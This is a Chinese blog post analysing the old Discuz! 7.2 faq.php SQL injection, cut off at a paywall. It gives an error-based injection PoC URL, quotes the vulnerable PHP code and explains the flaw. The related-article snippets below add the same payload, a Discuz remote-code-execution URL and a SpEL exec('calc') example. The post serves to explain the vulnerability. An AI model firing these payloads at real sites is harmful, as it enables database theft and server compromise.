复现一个老漏洞 Discuz!7.2 faq.php 注入漏洞 分析原理

最新推荐文章于 2021-04-12 08:46:46 发布
最新推荐文章于 2021-04-12 08:46:46 发布
阅读量4.1k 收藏
点赞数 1
分类专栏: 漏洞利用 文章标签: sql注入 Discuz!7.2
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Auuuuuuuu/article/details/83144847
版权

源码~   http://pan.baidu.com/s/1gfkvJrX

poc

/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=)%20and%20(select%201%20from%20(select%20count(*),concat(version(),floor(rand(0)*2))x%20from%20information_schema%20.tables%20group%20by%20x)a)%23

discuz开启全局变量注册,所以不用声明请求的方式。

关键代码  148行   

} elseif($action == 'grouppermission') {

...
...
	ksort($gids);
	$groupids = array();
	foreach($gids as $row) {
		$groupids[] = $row[0];
	}

	$query = $db->query("SELECT * FROM {$tablepre}usergroups u LEFT JOIN {$tablepre}admingroups a ON u.groupid=a.admingid WHERE u.groupid IN (".implodeids($groupids).")");

定义数组groupids,

进入for循环,然后把$gids中第一个数组赋值给$groupids,看到这里的$row[0],当遇到数组时,取第一个数组,当遇到字符串时,取字符串的第一个字符。

最低0.47元/天 解锁文章
hackersb123
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Discuz7.2版的faq.php SQL注入漏洞分析
10-25
主要介绍了Discuz7.2版的faq.php SQL注入漏洞分析,包含注入代码和源码分析,需要的朋友可以参考下
discuz7.2注入漏洞faq.php
01-08
discuz7.2注入漏洞
discuz 7.2 faq.php sql注入漏洞,Discuz <= 7.2 /faq.php SQL注入漏洞 EXP
weixin_36081891的博客
04-07 458
具体漏洞详情我就不多说了,大家可以看freebuf的介绍,链接在下方:http://www.freebuf.com/vuls/37643.html看了网上公布的一大堆exp,发都不是很好用,就自己写了一个获取管理员帐号密码以及uc_key的就不说了,构造语句就可以了,主要在于getshell,思路主要都是参照http://www.wooyun.org/bugs/wooyun-2014-04813...
discuz 7.2 faq.php sql注入漏洞,Discuz 7.2 /faq.php SQL注入漏洞
weixin_31935793的博客
04-07 4274
Discuz 7.2 /faq.php SQL注入漏洞1.获取数据库版本信息http://www.xxoo.com/faq.php?action=grouppermission&gids[99]='&gids[100][0]=) and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from ...
Discuz!7.2 SQL注入实验
Tranquillity
10-23 2130
0x01 实验准备 实验原理: 实验工具: UCenter Discuz 7.2安装包 实验环境: 安装 Discuz 网站的服务器(Windows) 安装 python 环境的攻击机 0x01 实验步骤 一、搭建环境 1. 安装UCenter 通过 http://192.168.88.129/dz7.2/upload/install/index.php 页面安装: 出错误: 将UCenter文件放置在dz7.2文件夹下,访问http://192.168.88.129/dz7.2/UCente
php 7.2.2bug,Discuz 7.2版本高危漏洞bug修
weixin_42502775的博客
03-11 377
使用discuz建站的朋友们应该都知道,discuz在已经更新到X3.2版本了,功能也和旧版本有了一些区别。小编今天在逛论坛看到一个关于discuz版本的消息,说的是Discuz! 7.2 系列论坛程序中含有高危安全漏洞。内容如下:根据相关安全组织的报告, Discuz! 7 系列论坛程序中含有高危安全漏洞。为保障您的论坛数据不被破坏, 请各位站长立即进行修或者防御,以免遭受到攻击。流动主要...
漏洞原理和解释.txt
01-31
漏洞
漏洞是什么如何.txt
最新发布
01-31
漏洞
漏洞是什么.txt
01-31
漏洞
Discuz!7.X 0day漏洞利用工具
03-04
Discuz!7.X 0day漏洞利用工具分享下!
dzexp利用工具 dz7.1 dz7.2 0day漏洞利用
01-28
dzexp利用工具 dz7.1 dz7.2 0day漏洞利用
dz7.2一键getshell
07-22
dz7.2一键getshell,python脚本,亲测成功
Discuz 7.2漏洞入侵图解
kuxing100的专栏
05-06 4399
Discuz 7.2漏洞入侵图解 找到一个论坛,注册一个账号 注册好后,使用exp 制以下代码: http://此处为论坛地址/misc.php?action=imme_binding&response[result]=1:2&scriptlang[1][2]=${${eval(chr(102).chr(112).chr(117).chr(11
Discuz!7.2 faq.php文件SQL注入漏洞分析及利用实战
weixin_34067049的博客
07-18 1266
Discuz!7.2 faq.php文件SQL注入漏洞分析及利用实战[antian365.com] simeon   最近网上公开了Discuz!7.2版本faq.php文件SQL注入0day,通过对文件漏洞分析以及实战测试,效果不错,公开利用exp的利用需要对SQL语句以及数据库等相当了解,在某些情况下需要多种技术配合才能最终攻克目标,下面就漏洞代码以及实战利用等进行探讨,对获取管理员密码的利用...
7.2 discuz 拿shell_Discuz 7.2FAQ-GETshell
weixin_42608299的博客
02-15 505
#!/usr/bin/env python# -*- coding: gbk -*-# -*- coding: gb2312 -*-# -*- coding: utf_8 -*-# author sbimport sysimport hashlibimport timeimport mathimport base64import urllib2import urllibimport redef s...
discuz7.2漏洞分析
qq_38415434的博客
08-07 868
一 参数的入口 这段话的意思时遍历三种提交的方法,获取参数传递的值。 有一个函数是daddslashes,跟进看一下。 这段代码的意思是对数据里的每一个字符都进行转义处理 二 漏洞产生的代码在faq.php195行 跟进implodeid函数,在faq.php的675行 这个函数的功能将数组里的值拆分出来,如图 到了这里我们知道,如果数组值当中存在在 / 或者 ’ ,那么在拼接s...
discuz漏洞汇总
热门推荐
hacker0ne的博客
05-05 5万+
Discuz漏洞拿服务器 路径泄露 ‘api/addons/zendcheck.php’, ‘api/addons/zendcheck52.php’, ‘api/addons/zendcheck53.php’, ‘source/plugin/mobile/api/1/index.php’, ...
discuz php7.1,Discuz! 7.1 & 7.2 远程代码执行漏洞
weixin_29192365的博客
04-12 732
特别说明:产生漏洞的$scriptlang数组在安装插件后已经初始化,因此有安装插件的用户不受影响。漏洞介绍:Discuz!新版本7.1与7.2版本中的showmessage函数中eval中执行的参数未初始化,可以任意提交,从而可以执行任意PHP命令。漏洞分析:下面来分析下这个远程代码执行漏洞,这个问题真的很严重,可以直接写shell的:一、漏洞来自showmessage函数:functions...
SpringBoot SpEL表达式注入漏洞-分析
06-02
SpringBoot SpEL表达式注入漏洞是一种常见的安全漏洞,攻击者可以利用该漏洞在应用中执行恶意代码,从而导致应用被攻击。下面我将对该漏洞进行分析。 一、漏洞分析 SpringBoot中的SpEL(Spring Expression Language)是一种基于表达式的语言,用于在运行时动态地计算值或执行逻辑。SpEL表达式可以用于访问对象的属性、调用对象的方法、进行条件判断等操作。在SpringBoot中,SpEL表达式可以用于注解中的属性值、配置文件中的属性值等场景。 在SpEL表达式中,可以使用一些特殊的语法来引用Bean对象或调用Bean对象的方法。例如,可以使用`#{beanName.methodName()}`的语法来调用Bean对象的方法。如果在SpEL表达式中使用了未经过滤的用户输入,就会存在SpEL表达式注入漏洞。 攻击者可以通过构造恶意的SpEL表达式,将其注入到应用中,从而执行恶意代码。例如,可以将`#{T(java.lang.Runtime).getRuntime().exec('calc')}`注入到应用中,从而在受害者机器上执行计算器程序。 二、漏洞 下面我将通过一个简单的漏洞来说明SpEL表达式注入漏洞的危害性。 1. 创建一个SpringBoot应用 首先,我们需要创建一个SpringBoot应用。可以使用Spring Initializr来快速创建一个基本的SpringBoot应用。 2. 添加注解 在创建好的SpringBoot应用中,我们可以添加一个Controller类,并在其中添加一个RequestMapping注解。在RequestMapping注解中,我们可以使用SpEL表达式来引用Bean对象或调用Bean对象的方法。 ```java @RestController public class MyController { @RequestMapping("/test") public String test() { return "hello world"; } @RequestMapping(value = "/{name}", method = RequestMethod.GET) public String sayHello(@PathVariable("name") String name) { return "Hello " + name + "!"; } @RequestMapping(value = "/spel", method = RequestMethod.GET) public String spel() { String expression = "#{T(java.lang.Runtime).getRuntime().exec('calc')}"; ExpressionParser parser = new SpelExpressionParser(); Expression exp = parser.parseExpression(expression); return exp.getValue().toString(); } } ``` 在上述代码中,我们在/spel接口中使用了SpEL表达式来调用Runtime.getRuntime().exec方法,从而执行计算器程序。 3. 启动应用 启动应用后,访问/spel接口,可以看到计算器程序被成功执行。 4. 防范措施 为了防范SpEL表达式注入漏洞,我们可以采取以下措施: 1. 对用户输入进行过滤和验证,避免未经过滤的用户输入被注入到SpEL表达式中。 2. 尽量避免在注解或配置文件中使用SpEL表达式。 3. 对于必须使用SpEL表达式的场景,可以对SpEL表达式进行白名单过滤,只允许特定的SpEL表达式被执行。 4. 在应用中禁用动态表达式功能,避免SpEL表达式被执行。 5. 总结 SpEL表达式注入漏洞是一种常见的安全漏洞,攻击者可以利用该漏洞在应用中执行恶意代码。为了防范该漏洞,我们需要对用户输入进行过滤和验证,避免未经过滤的用户输入被注入到SpEL表达式中。同时,尽量避免在注解或配置文件中使用SpEL表达式,对于必须使用SpEL表达式的场景,可以对SpEL表达式进行白名单过滤,只允许特定的SpEL表达式被执行。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值